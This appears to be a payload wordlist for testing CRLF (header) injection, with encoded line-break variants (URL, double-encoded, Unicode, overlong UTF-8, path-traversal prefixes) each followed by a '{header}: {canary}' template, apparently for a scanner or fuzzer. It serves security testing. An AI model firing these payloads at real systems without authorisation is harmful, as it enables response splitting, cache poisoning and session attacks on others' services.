%0a{header}: {canary}
%0d{header}: {canary}
%0d%0a{header}: {canary}
%0d%0a%0d%0a{header}: {canary}
%250a{header}: {canary}
%250d{header}: {canary}
%250d%250a{header}: {canary}
%25250a{header}: {canary}
%25250d%25250a{header}: {canary}
%u000a{header}: {canary}
%u000d%u000a{header}: {canary}
%u2028%u2029{header}: {canary}
..%2f%0d%0a{header}: {canary}
..%5c%0d%0a{header}: {canary}
%2e%2e%2f%0d%0a{header}: {canary}
%2f%2e%2e%0d%0a{header}: {canary}
%25%30%61{header}: {canary}
%25%30a{header}: {canary}
%c0%8d%c0%8a{header}: {canary}
%ea%a8%8a{header}: {canary}
%c4%8d%c4%8a{header}: {canary}
